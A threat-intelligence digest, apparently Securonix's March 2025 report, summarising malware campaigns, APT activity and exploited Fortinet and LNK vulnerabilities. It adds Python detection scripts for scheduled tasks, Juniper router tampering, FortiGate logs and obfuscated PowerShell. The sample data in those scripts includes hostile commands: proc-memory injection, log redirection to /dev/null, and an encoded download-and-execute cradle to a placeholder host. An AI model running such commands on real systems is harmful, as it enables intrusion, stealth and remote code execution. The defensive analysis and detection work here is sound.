Securonix Threat Labs Monthly Intelligence Insights – March 2025


Authors: Nitish Singh and Nikhil Kumar Chadha

The Monthly Intelligence Insights provides a summary of top threats curated, monitored, and analyzed by Securonix Threat Labs in March 2025. The report additionally provides a synopsis of the threats; indicators of compromise (IoCs); tactics, techniques, and procedures (TTPs); and related tags. Each threat has a comprehensive summary from Threat Labs and search queries from the Threat Research team. For additional information on Threat Labs and related search queries used via Autonomous Threat Sweeper to detect the below-mentioned threats, refer to our Threat Labs home page.

Last month, Securonix Autonomous Threat Sweeper identified and analyzed 3,372 TTPs and IoCs and 149 emerging threats, investigated 60 potential threats, and elevated 7 threat incidents. The top data sources swept against include IDS / IPS / UTM / Threat Detection, Data Loss Prevention, Endpoint Management Systems, and Email / Email Security.

Malware: A Growing Threat in the Cybersecurity Landscape

(Originally published in March 2025)

The Autonomous Threat Sweeper team detected a significant increase in malware campaigns in March 2025. A notable example is the OBSCURE#BAT campaign, which employs heavily obfuscated batch scripts and PowerShell commands to deliver the r77 rootkit while evading detection through API hooking and persistence within the Windows Registry. Additionally, the newly discovered StilachiRAT specifically targets cryptocurrency wallets, bypassing detection by communicating over commonly used ports. Meanwhile, XCSSET malware, which targets macOS, has been upgraded with sophisticated evasion techniques aimed at stealing sensitive data. Lastly, CoffeeLoader malware evades detection and deploys additional payloads via SmokeLoader.

OBSCURE#BAT – The Securonix Threat Research team has discovered the OBSCURE#BAT malware campaign, which leverages heavily obfuscated batch scripts and PowerShell commands to deploy an advanced rootkit called “r77.” The attack chain begins with social engineering tactics, such as fake software updates and CAPTCHA verifications, tricking users into executing malicious scripts. These scripts employ evasion techniques like API hooking, allowing the malware to remain undetected by security tools.

Key aspects of the attack include:

  • Obfuscation: The malware disguises its batch files with unnecessary characters and variables, making detection challenging.
  • API Hooking: The r77 rootkit manipulates API calls to hide files, registry keys, and running processes from standard Windows tools.
  • Persistence: The final payload is stored in the Windows Registry, enabling stealthy execution.

At Securonix, we believe OBSCURE#BAT primarily targets English-speaking users, as its lures, links, and file names are all in English. Additionally, the threat actors’ infrastructure appears to be based in the US. However, researchers have not yet been able to attribute the malware campaign to any specific group or country.

StilachiRAT – StilachiRAT, a new remote access Trojan (RAT) tracked by Microsoft, combines a wide range of malicious capabilities to maximize its impact. Discovered in November 2024, it is capable of extensive system reconnaissance, data gathering, credential theft, and cryptocurrency theft. The malware targets cryptocurrency wallets in Google Chrome and can extract passwords and sensitive information. Its stealth features allow it to evade detection by communicating through commonly used ports like 53 and 443, often associated with DNS and HTTPS traffic. StilachiRAT also includes mechanisms for persistence, operating as either a Windows service or standalone component, with self-protection features.

New XCSSET Malware – XCSSET, a malicious infostealer targeting macOS, has been updated with enhanced obfuscation, persistence mechanisms, and infection strategies, according to a warning from Microsoft. The malware, previously seen in attacks against Apple developers, can steal data from applications like Safari, Skype, Telegram, WeChat, and Notes, take screenshots, exfiltrate files, and encrypt data. The new variant introduces more sophisticated evasion techniques, such as randomized payload generation and a mix of encoding methods like Base64. XCSSET continues to target digital wallets and exfiltrate sensitive information. The update marks the first known change to the malware since 2022 and increases its potential for supply chain attacks, with its reach expected to expand.

CoffeeLoader Malware – CoffeeLoader, a new sophisticated malware loader identified in September 2024, is designed to deploy second-stage payloads while evading detection using techniques such as GPU-based code execution via the “Armoury” packer, call stack spoofing, sleep obfuscation, and Windows fibers. It employs a Domain Generation Algorithm (DGA) for command-and-control fallback and certificate pinning to secure communications. CoffeeLoader has been observed deploying Rhadamanthys shellcode and shares several similarities with SmokeLoader, including stager-based module injection, bot ID generation, mutex name creation, import resolution by hash, RC4 encryption for network traffic, and use of low-level Windows APIs. The relationship between the two malware families remains unclear.

The Armoury packer hijacks legitimate Armoury Crate exports and uses the OpenCL library to decrypt shellcode on the GPU. CoffeeLoader’s dropper installs the packed DLL and establishes persistence through the Windows Task Scheduler, while also setting file attributes to prevent deletion or modification. The loader’s stager creates a suspended dllhost.exe process to inject the main module, which resolves API function addresses using the DJB2 algorithm and incorporates additional anti-detection techniques.


Threat Labs summary

Securonix Threat Labs recommends leveraging our findings to deploy defensive measures against these malicious campaigns.

  • Remain vigilant against social engineering, malvertising, and fake CAPTCHA scams that deceive users into running malicious code. Remember, legitimate CAPTCHA services will never copy code to your clipboard or prompt execution. Exercise caution when handling batch (.bat) files from unknown sources, as they are frequently used in phishing attacks.
  • Organizations are advised to implement security-hardening measures to prevent initial compromise, such as:
    • Enabling Safe Links and Safe Attachments in Microsoft 365.
    • Using endpoint detection and response (EDR) in block mode.
    • Activating Microsoft Defender protections against potentially unwanted applications (PUAs).
  • Developers should verify Xcode projects before use and only install applications from trusted sources.
  • Organizations should prioritize enhanced endpoint detection and response (EDR) solutions with advanced behavioral analysis capabilities that can detect and block suspicious activity patterns associated with process injection, call stack manipulation, and memory obfuscation techniques, even when combined with GPU-based code execution.
  • 190 IoCs are available on our Threat Labs home page repository and have been swept against Autonomous Threat Sweeper customers.


TTPs related to the OBSCURE#BAT campaign include but are not limited to the following:

  • Monitor for any suspicious activity where files, processes, or registry keys matching the “$nya-” prefix are hidden, as this could indicate an infection on the system.
  • Monitor for the registration of a fake driver, such as “ACPIx86.sys,” which could indicate an attempt to gain deeper system access. 
  • Monitor for suspicious PowerShell commands querying disk drive information, such as those using the “Get-WmiObject” cmdlet, as they may signal malicious activity.


TTPs related to the StilachiRAT campaign include but are not limited to the following:

  • Monitor for process injections and suspicious service installations, particularly those logged under Event ID 7045, which indicates that a new service has been installed on the system.
  • Monitor for any attempts to access or decrypt Google Chrome stored credentials from the following locations:
    • %LOCALAPPDATA%\Google\Chrome\User Data\Local State
    • %LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data


TTPs related to the XCSSET campaign include but are not limited to the following:

  • Monitor for unauthorized modifications to .pbxproj files in Xcode projects.
  • Monitor for execution of shell commands such as curl, xxd, Base64 decoding, or obfuscated scripts being piped to sh.
  • Monitor for unexpected osascript executions or AppleScript payloads running in the background.
  • Monitor for modifications to ~/.zshrc and ~/.zshrc_aliases to ensure malware runs on new shell sessions.
  • Monitor for unauthorized use of dockutil to replace legitimate Launchpad shortcuts with malicious payloads.


TTPs related to the CoffeeLoader campaign include but are not limited to the following:

  • Monitor for the creation of dllhost.exe processes in a suspended state, especially if followed by code injection activity. Also, watch for rundll32.exe being launched with unusual or unexpected DLLs, particularly those located in temporary directories.
  • Monitor for processes attempting to modify ACLs (using SetEntriesInAclW or similar APIs) to deny users DELETE, WRITE_DATA, WRITE_EA, or WRITE_ATTRIBUTES permissions on files.
  • Monitor for the creation of scheduled tasks with names like “AsusUpdateServiceUA” or similar, especially if they are configured to run frequently (e.g., every 10 or 30 minutes) or on user logon.
  • Monitor for processes that are frequently changing the memory region permissions of their own code or that of other processes (e.g., toggling between PAGE_READWRITE and PAGE_EXECUTE_READ).
  • Monitor for processes that encrypt large portions of their memory while in a sleep state, then decrypt them upon waking. This may involve the use of Windows API calls like SystemFunction032 (RC4 encryption) or other custom encryption routines.
  • Monitor for processes attempting to bypass Control Flow Guard (CFG) by adding exceptions for specific functions like NtContinue, NtSetContextThread, or SystemFunction032 using NtSetInformationVirtualMemory with the VmCfgCallTargetInformation class.
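As an added example (not Securonix's or CoffeeLoader's code), the Python below applies the scheduled-task checks from the list above to a Task Scheduler XML definition of the kind `schtasks /Query /TN <name> /XML` exports: a task name like “AsusUpdateServiceUA”, a repetition interval of 30 minutes or less, a logon trigger, and rundll32.exe loading a DLL from a Temp directory. The task name comes from the list; the DLL name and user path in the sample are constructed placeholders.

```python
import re
import xml.etree.ElementTree as ET

# Task Scheduler XML namespace used by exported task definitions.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# Task names resembling "AsusUpdateServiceUA" from the CoffeeLoader TTPs above.
SUSPICIOUS_NAME = re.compile(r"asus.*update.*service", re.IGNORECASE)
# Repetition intervals of 30 minutes or less count as "frequent".
FREQUENT_SECONDS = 30 * 60
TEMP_PATH = re.compile(r"\\Temp\\", re.IGNORECASE)


def iso_duration_seconds(value):
    """Parse the ISO-8601 duration subset Task Scheduler uses (PT10M, PT1H30M, P1DT2H).
    Returns None if the value is not a recognised duration."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value.strip())
    if not m:
        return None
    days, hours, minutes, seconds = (int(x) if x else 0 for x in m.groups())
    return days * 86400 + hours * 3600 + minutes * 60 + seconds


def analyze_task(task_name, task_xml):
    """Return finding tags for one task definition. Pass the raw bytes of an exported
    file so that its UTF-16 XML declaration is honoured; a str works for inline XML."""
    findings = []
    if SUSPICIOUS_NAME.search(task_name):
        findings.append("name_matches_coffeeloader_pattern")
    root = ET.fromstring(task_xml)
    # Triggers with a short repetition interval (e.g. every 10 or 30 minutes).
    for interval in root.findall(".//t:Repetition/t:Interval", NS):
        text = (interval.text or "").strip()
        secs = iso_duration_seconds(text)
        if secs is not None and secs <= FREQUENT_SECONDS:
            findings.append("frequent_repetition:" + text)
    # A logon trigger gives the loader a second persistence path.
    if root.find(".//t:Triggers/t:LogonTrigger", NS) is not None:
        findings.append("runs_on_logon")
    # rundll32.exe loading a DLL from a Temp directory is the other item in the list.
    for exe in root.findall(".//t:Actions/t:Exec", NS):
        command = (exe.findtext("t:Command", default="", namespaces=NS) or "").strip()
        arguments = (exe.findtext("t:Arguments", default="", namespaces=NS) or "").strip()
        if command.lower().endswith("rundll32.exe") and TEMP_PATH.search(arguments):
            findings.append("rundll32_loads_dll_from_temp")
    return findings


# Constructed sample task (not a real CoffeeLoader artefact): the task name is from the
# TTP list above; the DLL name and user path are placeholders.
SAMPLE_TASK_NAME = "AsusUpdateServiceUA"
SAMPLE_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT10M</Interval></Repetition>
      <StartBoundary>2025-03-01T09:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
    <LogonTrigger><Enabled>true</Enabled></LogonTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Windows\\System32\\rundll32.exe</Command>
      <Arguments>C:\\Users\\user\\AppData\\Local\\Temp\\loader.dll,#1</Arguments>
    </Exec>
  </Actions>
</Task>"""

# A benign-looking task for comparison: hourly, runs from Program Files, no logon trigger.
BENIGN_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT1H</Interval></Repetition></TimeTrigger></Triggers>
  <Actions><Exec><Command>C:\\Program Files\\Vendor\\updater.exe</Command></Exec></Actions>
</Task>"""

if __name__ == "__main__":
    print(SAMPLE_TASK_NAME, analyze_task(SAMPLE_TASK_NAME, SAMPLE_TASK_XML))
    print("VendorUpdate", analyze_task("VendorUpdate", BENIGN_TASK_XML))
```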

Tags: Malware: OBSCURE#BAT, StilachiRAT, XCSSET, CoffeeLoader | Target: English Speaking Users


Threat Actors Activity Overview 

(Originally published in March 2025)

In March 2025, UNC3886 and MirrorFace increased their attack activity. UNC3886 targets outdated Juniper routers, while MirrorFace uses advanced techniques and targets diplomatic organizations.

Firstly, the China-nexus cyber espionage group UNC3886 has shifted its tactics and is now targeting end-of-life Juniper Networks MX Series routers. The group deploys custom backdoors with active and passive functions, including an embedded script that disables logging mechanisms to enable stealthy long-term persistence. Previously, UNC3886 exploited zero-day vulnerabilities in Fortinet, Ivanti, and VMware devices to gain remote access. Mandiant discovered these backdoors in mid-2024 and collaborated with Juniper Networks to investigate. The affected devices were running outdated hardware and software. UNC3886’s operations aim to maintain long-term access to victim networks, primarily targeting organizations in the defense, technology, and telecommunications sectors in the US and Asia.

Second, the China-aligned APT group MirrorFace, active since 2019, has primarily targeted Japanese-affiliated sectors. In 2024, the group expanded its operations, employing Visual Studio Code’s remote tunnels and side-loading malware via McAfee and JustSystems applications. Between June and September 2024, MirrorFace used Expo 2025 as a lure in spearphishing attacks, deploying ANEL via PowerShell-based infection chains.

In August 2024, MirrorFace expanded its cyber-espionage activities beyond Japan, targeting a Central European diplomatic entity in Operation AkaiRyū. The group used sophisticated tactics, including a customized AsyncRAT, the resurgence of the ANEL backdoor, and stealthy execution chains. To evade detection, MirrorFace deleted logs, erased malware traces, and leveraged Windows Sandbox, highlighting its growing operational security and the increasing cyber threat landscape.


Threat Labs summary

Securonix Threat Labs recommends leveraging our findings to deploy defensive measures against these threat actors.

  • Organizations should upgrade their Juniper devices to the latest firmware versions, which include mitigations and updated JMRT signatures, and perform a JMRT Quick Scan and Integrity Check post-upgrade.
  • Enforce strict access controls, network segmentation, and other security measures on network devices, administrative systems, and those used for network management.
  • Enable advanced email filtering to block spearphishing, train employees to identify phishing attempts and avoid malicious links or attachments, and implement email authentication protocols like DMARC, DKIM, and SPF to prevent email spoofing.
  • Implement multi-factor authentication (MFA) to protect against stolen credentials, apply the principle of least privilege (PoLP) to limit user access, and monitor and restrict the use of remote tools like Visual Studio Code remote tunnels.
  • 40 IoCs are available on our Threat Labs home page repository and have been swept against Autonomous Threat Sweeper customers.


TTPs related to the UNC3886 campaign include but are not limited to the following:

  • Monitor for the presence of TINYSHELL-based backdoors disguised as legitimate Junos OS processes (appid, to, irad, lmpad, jdosd, oemd).
  • Monitor for the execution of Base64-encoded files (ldb.b64) and unexpected archive extraction (tar, gunzip).
  • Monitor for the creation of unusual named pipes (mkfifo null; cat null &) used to execute payloads.
  • Monitor for memory injection attacks, where malware is injected into legitimate processes (cat, snmpd, mgd) using: dd if=<malware> of=/proc/<pid>/mem conv=notrunc.
  • Monitor for unexpected outbound connections from Juniper routers to hardcoded command-and-control (C2) servers over ports 22, 31234, or 33512.
  • Monitor for unusual ICMP traffic with embedded commands, using a specific magic string (uSarguuS62bKRA0J).
  • Monitor for disabled logging mechanisms, particularly modifications to:
    • /var/log/messages, /var/log/auth, /var/log/interactive-commands
    • /mfs/var/etc/syslog.conf being altered to redirect logs to /dev/null.
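As an added example, not code from Securonix, Mandiant or Juniper, the Python below turns the UNC3886 items above into checks a defender can run over three kinds of evidence: shell commands recovered from a router (shell history or interactive-commands logs), the contents of /mfs/var/etc/syslog.conf, and raw IPv4 packets from a capture. All sample inputs are constructed; the process IDs, file names and addresses are placeholders.

```python
import re
import struct

# Patterns from the UNC3886 TTP list above; each maps to a finding tag.
COMMAND_RULES = [
    ("named_pipe_exec", re.compile(r"\bmkfifo\b.*;\s*cat\b.*&")),
    ("proc_mem_injection", re.compile(r"\bdd\b.*\bof=/proc/\d+/mem\b")),
    ("b64_payload_decode", re.compile(r"\bbase64\b.*\.b64\b")),
    ("archive_extraction", re.compile(r"\b(?:tar|gunzip)\b")),   # weak signal on its own
]
LOG_PATHS = re.compile(r"/mfs/var/etc/syslog\.conf|/var/log/(?:messages|auth|interactive-commands)")
WRITE_OPS = re.compile(r"\bsed\s+-i\b|\b(?:rm|mv|cp|chflags|truncate)\b|>")
ICMP_MAGIC = b"uSarguuS62bKRA0J"


def classify_command(cmd):
    """Return the finding tags that apply to one shell command line."""
    tags = [tag for tag, rx in COMMAND_RULES if rx.search(cmd)]
    # A log path plus a write/modify operation is log tampering; reading a log is not flagged.
    if LOG_PATHS.search(cmd) and WRITE_OPS.search(cmd):
        tags.append("log_tampering")
    return tags


def scan_commands(lines):
    """Return (line, tags) for every command that triggers at least one rule."""
    hits = []
    for line in lines:
        tags = classify_command(line)
        if tags:
            hits.append((line, tags))
    return hits


def syslog_conf_to_devnull(conf_text):
    """Return the selectors in a syslog.conf whose action is /dev/null (logs silently dropped)."""
    dropped = []
    for line in conf_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()            # selector <whitespace> action
        if len(parts) >= 2 and parts[-1] == "/dev/null":
            dropped.append(parts[0])
    return dropped


def icmp_carries_magic(ip_packet):
    """True if a raw IPv4 packet is ICMP and its data contains the magic string."""
    if len(ip_packet) < 20:
        return False
    ihl = (ip_packet[0] & 0x0F) * 4        # IPv4 header length in bytes
    protocol = ip_packet[9]
    if protocol != 1 or len(ip_packet) < ihl + 8:
        return False
    return ICMP_MAGIC in ip_packet[ihl + 8:]   # skip ICMP type/code/checksum/id/seq


def build_icmp_echo(data):
    """Construct a minimal IPv4/ICMP echo request for testing (checksums left at zero)."""
    total_len = 20 + 8 + len(data)
    ip_header = struct.pack("!BBHHHBBH4s4s", 0x45, 0, total_len, 0, 0, 64, 1, 0,
                            bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    icmp_header = struct.pack("!BBHHH", 8, 0, 0, 1, 1)
    return ip_header + icmp_header + data


# Constructed evidence (not from a real incident).
SAMPLE_COMMANDS = [
    "ls -la /var/tmp",
    "base64 -d /var/tmp/ldb.b64 > /var/tmp/ldb.tgz",
    "tar -xzf /var/tmp/ldb.tgz -C /var/tmp",
    "mkfifo null; cat null &",
    "dd if=/var/tmp/ldb of=/proc/1234/mem conv=notrunc",
    "sed -i 's#/var/log/messages#/dev/null#' /mfs/var/etc/syslog.conf",
    "cat /var/log/messages",
]
SAMPLE_SYSLOG_CONF = """# constructed syslog.conf
*.info;*.notice\t/dev/null
authorization.info\t/dev/null
interactive-commands.*\t/var/log/interactive-commands
"""

if __name__ == "__main__":
    for line, tags in scan_commands(SAMPLE_COMMANDS):
        print(tags, line)
    print("selectors sent to /dev/null:", syslog_conf_to_devnull(SAMPLE_SYSLOG_CONF))
    print("magic in ICMP:", icmp_carries_magic(build_icmp_echo(b"ping" + ICMP_MAGIC + b"id")))
```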

Tags: Threat Actor: MirrorFace (Earth Kasha), APT10 subgroup, UNC3886 | Target Region: Central Europe, Japan | Industry Targeted: Diplomacy, Government, Research, Media, Finance, Defense | Attack Vector: Spearphishing, Social Engineering, Malicious Attachments, OneDrive Links | Malware Used: ANEL (UPPERCUT), AsyncRAT, HiddenFace, FaceXInjector | Tools Abused: Visual Studio Code, Windows Sandbox, McAfee Executables, JustSystems Applications | Lure Used: Expo 2025 (Osaka, Japan)


Emerging Vulnerabilities 

(Originally published in March 2025)

In March 2025, state-sponsored APT groups and cybercriminals exploited the ZDI-CAN-25373 vulnerability in Windows LNK files, targeting key sectors globally. Additionally, the “SuperBlack” ransomware campaign, linked to Mora_001, exploited Fortinet vulnerabilities to deploy ransomware.

Firstly, a recently discovered zero-day vulnerability (ZDI-CAN-25373) in Windows shortcut (LNK) files is being actively exploited by state-sponsored APT groups from North Korea, Iran, Russia, and China for espionage and financial gain. This vulnerability allows attackers to remotely execute arbitrary code when a victim opens or views a malicious shortcut. The exploitation occurs through spear-phishing emails, malicious archives, or USB-based attacks, delivering payloads like RATs or keyloggers. Targeted campaigns have been observed against government agencies, financial institutions, telecommunications, military, and energy sectors worldwide, with nearly 1,000 weaponized LNK samples identified.

Second, the newly discovered “SuperBlack” ransomware campaign, orchestrated by the threat actor “Mora_001,” targets unpatched FortiOS devices by exploiting two Fortinet vulnerabilities (CVE-2024-55591 and CVE-2025-24472). Linked to the LockBit ecosystem, the attackers gain unauthorized access, deploy ransomware to encrypt critical files, and demand cryptocurrency for decryption keys. The campaign impacts sectors such as finance, healthcare, and government.


Threat Labs summary

Securonix Threat Labs recommends leveraging our findings to deploy protective measures for increased threats from these vulnerabilities.

  • Block execution of .lnk files from untrusted sources.
  • Disable unnecessary Windows scripting tools (e.g., PowerShell, cmd) for non-administrative users.
  • Apply security updates for CVE-2024-55591 and CVE-2025-24472 on all Fortinet devices.
  • Monitor FortiGate dashboards for unusual access patterns.
  • Enforce multi-factor authentication (MFA) for all VPN and administrative accounts.
  • 857 IoCs are available on our Threat Labs home page repository and have been swept against Autonomous Threat Sweeper customers.


TTPs related to Mora_001 include but are not limited to the following:

  • Monitor HTTP/S connections to external firewall IPs for the presence of “local_access_token” in the URL.
  • Monitor for profiles containing the string super_admin in “Admin login successful” logs, or for the strings [super_admin->super_admin]password[*] or [super_admin]vdom[root]password[*].
  • Monitor for newly added local users on the firewall by reviewing logs with “Object attribute configured” and messages like “Add system.admin <user_name>”.
  • Monitor for new users added to VPN groups by checking logs with “Object attribute configured” and messages like “Edit user.group VPN Users” or “Add user.localxxx1”.
  • Monitor GUI access from external IPs by looking for logs with “cfgpath”: “system.admin” combined with “ui”: “GUI(<ip address>)”.
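To make the FortiGate log conditions above concrete, here is an added Python example (not Securonix's or Fortinet's code) that parses FortiGate key=value syslog lines and applies each rule from the list. The log lines are constructed, with 203.0.113.5 standing in for an external address and newadmin01 as a placeholder account name; the set of address ranges treated as internal is an assumption to adjust to your own address plan.

```python
import ipaddress
import re

# FortiGate syslog fields are key=value pairs; values may be double-quoted.
KV = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')
# ui="GUI(203.0.113.5)" carries the source IP of a GUI session.
UI_IP = re.compile(r"^GUI\((\d{1,3}(?:\.\d{1,3}){3})\)", re.IGNORECASE)
# Ranges considered internal (assumption); anything else is treated as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def parse_fortigate_line(line):
    """Parse one FortiGate key=value log line into a dict with quotes stripped."""
    record = {}
    for key, value in KV.findall(line):
        if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
            value = value[1:-1]
        record[key] = value
    return record


def is_external(ip_text):
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False
    return not any(ip in net for net in INTERNAL_NETS)


def evaluate(record):
    """Apply the Mora_001 detection rules from the list above to one parsed record."""
    findings = []
    logdesc = record.get("logdesc", "")
    msg = record.get("msg", "")
    cfgattr = record.get("cfgattr", "")
    # Rule 1: local_access_token in a URL.
    if "local_access_token" in record.get("url", ""):
        findings.append("local_access_token_in_url")
    # Rule 2: super_admin profile on a successful login, or [super_admin...] in config strings.
    if logdesc == "Admin login successful" and "super_admin" in record.get("profile", ""):
        findings.append("super_admin_login")
    if "[super_admin" in msg or "[super_admin" in cfgattr:
        findings.append("super_admin_in_config_change")
    # Rules 3 and 4: new local admin, or VPN group / local user changes.
    if logdesc == "Object attribute configured":
        if msg.startswith("Add system.admin"):
            findings.append("local_admin_added")
        if "user.group" in msg or msg.startswith("Add user.local"):
            findings.append("vpn_user_or_group_changed")
    # Rule 5: admin object changed from a GUI session whose source IP is external.
    m = UI_IP.match(record.get("ui", ""))
    if record.get("cfgpath") == "system.admin" and m and is_external(m.group(1)):
        findings.append("admin_config_from_external_gui")
    return findings


def scan(lines):
    """Return (line_number, findings) for each line that matches at least one rule."""
    hits = []
    for number, line in enumerate(lines, start=1):
        findings = evaluate(parse_fortigate_line(line))
        if findings:
            hits.append((number, findings))
    return hits


# Constructed log lines (field layout follows FortiGate event logs; values are made up).
SAMPLE_LOGS = [
    'date=2025-03-10 time=02:14:07 type="event" subtype="system" logdesc="Admin login successful" '
    'user="admin" ui="GUI(203.0.113.5)" profile="super_admin" action="login" status="success" '
    'msg="Administrator admin logged in successfully from GUI(203.0.113.5)"',
    'date=2025-03-10 time=02:15:30 type="event" subtype="system" logdesc="Object attribute configured" '
    'user="admin" ui="GUI(203.0.113.5)" cfgpath="system.admin" cfgobj="newadmin01" '
    'cfgattr="accprofile[super_admin]vdom[root]password[*]" msg="Add system.admin newadmin01"',
    'date=2025-03-10 time=02:16:02 type="event" subtype="system" logdesc="Object attribute configured" '
    'user="admin" ui="GUI(203.0.113.5)" cfgpath="user.group" cfgobj="VPN Users" msg="Edit user.group VPN Users"',
    'date=2025-03-10 time=02:10:41 type="traffic" subtype="forward" srcip=203.0.113.5 dstport=443 '
    'url="/api/v2/cmdb/system/admin?local_access_token=REDACTED"',
    'date=2025-03-10 time=09:00:00 type="event" subtype="system" logdesc="Admin login successful" '
    'user="netops" ui="ssh(10.0.0.4)" profile="prof_admin" msg="Administrator netops logged in successfully from ssh(10.0.0.4)"',
]

if __name__ == "__main__":
    for number, findings in scan(SAMPLE_LOGS):
        print(f"line {number}: {findings}")
```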


TTPs related to ZDI-CAN-25373 include but are not limited to the following:

  • A .lnk file launching cmd.exe or powershell.exe is the primary red flag. Look for cmd.exe or powershell.exe executions with heavily obfuscated command-line arguments; this could include Base64 encoding, character substitution, or other techniques that hide the intent of the command.
  • Monitor for suspicious icons and filenames: LNK files disguised with icons of common file types (e.g., PDFs, Word documents) and with deceptive filenames (e.g., document.pdf.lnk).
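The following Python is an added example (not Securonix's code) of the first check above applied to process-creation telemetry. It takes Sysmon Event ID 1-style records (Image, ParentImage, CommandLine), keeps cmd.exe/powershell.exe children of the applications through which a user opens a shortcut, and scores the command line for the obfuscation the text describes: Base64 -EncodedCommand (decoded and inspected), caret insertion, environment-variable substitution, evasion flags, and long whitespace runs that push the real arguments out of view. The events are constructed, the launcher list is an assumption, and example.invalid is a placeholder host.

```python
import base64
import re

SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Processes through which a user typically opens a shortcut: Explorer, mail client, archivers.
# Assumption for this example; extend it to the mail and archive tools in your environment.
LNK_LAUNCHERS = {"explorer.exe", "outlook.exe", "winrar.exe", "7zfm.exe"}

PS_EVASION_FLAGS = re.compile(
    r"(?i)(?<![\w-])-(?:nop|noprofile|noni|noninteractive|w(?:indowstyle)?\s+hidden|"
    r"ep\s+bypass|executionpolicy\s+bypass)\b")
ENCODED_COMMAND = re.compile(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})")
DOWNLOAD_OR_IEX = re.compile(
    r"(?i)downloadstring|invoke-webrequest|\biwr\b|\biex\b|invoke-expression|frombase64string")
WHITESPACE_RUN = re.compile(r"\s{50,}")


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(blob):
    """Decode a PowerShell -EncodedCommand value (Base64 of UTF-16LE); None if it does not decode."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def obfuscation_indicators(cmdline):
    """Return tags describing how a cmd/powershell command line hides its intent."""
    tags = []
    if PS_EVASION_FLAGS.search(cmdline):
        tags.append("ps_evasion_flags")
    m = ENCODED_COMMAND.search(cmdline)
    if m:
        tags.append("encoded_command")
        decoded = decode_encoded_command(m.group(1))
        if decoded and DOWNLOAD_OR_IEX.search(decoded):
            tags.append("decoded_download_or_iex")
    if cmdline.count("^") >= 5:          # cmd.exe caret insertion, e.g. p^o^w^e^r^s^h^e^l^l
        tags.append("caret_obfuscation")
    if cmdline.count("%") >= 6:          # three or more %VAR% substitutions
        tags.append("env_var_substitution")
    if WHITESPACE_RUN.search(cmdline):   # long whitespace runs hide the real arguments
        tags.append("whitespace_padding")
    return tags


def evaluate_process_event(event):
    """event: dict with Sysmon Event ID 1 field names Image, ParentImage and CommandLine."""
    child = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    if child not in SHELL_CHILDREN or parent not in LNK_LAUNCHERS:
        return []
    return obfuscation_indicators(event.get("CommandLine", ""))


# Constructed events. The encoded payload is a download cradle pointing at a placeholder host.
SAMPLE_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')".encode("utf-16-le")
).decode("ascii")
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -ep bypass -enc " + SAMPLE_ENCODED},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c" + " " * 120 + "p^o^w^e^r^s^h^e^l^l -w hidden -File x.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\svchost.exe",   # not a shortcut launcher: out of scope here
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -enc " + SAMPLE_ENCODED},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(basename(event["ParentImage"]), "->", basename(event["Image"]),
              evaluate_process_event(event))
```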

Tags: Campaign: SuperBlack Ransomware | Vulnerability: ZDI-CAN-25373, CVE-2024-55591 and CVE-2025-24472 | Threat Actor: Mora_001 | Target Sector: Critical Infrastructure, Enterprises, Government, financial, telecommunications, military, energy, private sector | Target Countries: North America, Europe, Asia, South America, and Australia.


Surge in Ransomware & RaaS Threats 

(Originally published in March 2025)

In February 2025, the Winnti Group targeted Japanese industries via the RevivalStone campaign, exploiting SQL injection vulnerabilities. Kimsuky used spear-phishing with LNK files to deploy the PebbleDash backdoor and an RDP Wrapper. Both groups focused on data theft and persistence, posing significant threats to critical sectors.

Winnti Group – The China-based APT group known as Winnti, also referred to as APT41, has launched a cyber campaign called RevivalStone, first identified in 2024. This campaign specifically targets Japanese organizations in key sectors, including manufacturing, materials, and energy. RevivalStone employs an upgraded version of the Winnti malware, featuring enhanced capabilities. The attack begins with SQL injection exploits in web-facing ERP systems, allowing the deployment of web shells such as China Chopper, Behinder, and sqlmap file uploader to gain initial access. These web shells enable reconnaissance, credential harvesting, and lateral movement within the compromised networks. Winnti is known for targeting intellectual property and sensitive data across various industries, including gaming, pharmaceuticals, aerospace, and, more recently, Japan’s critical infrastructure.

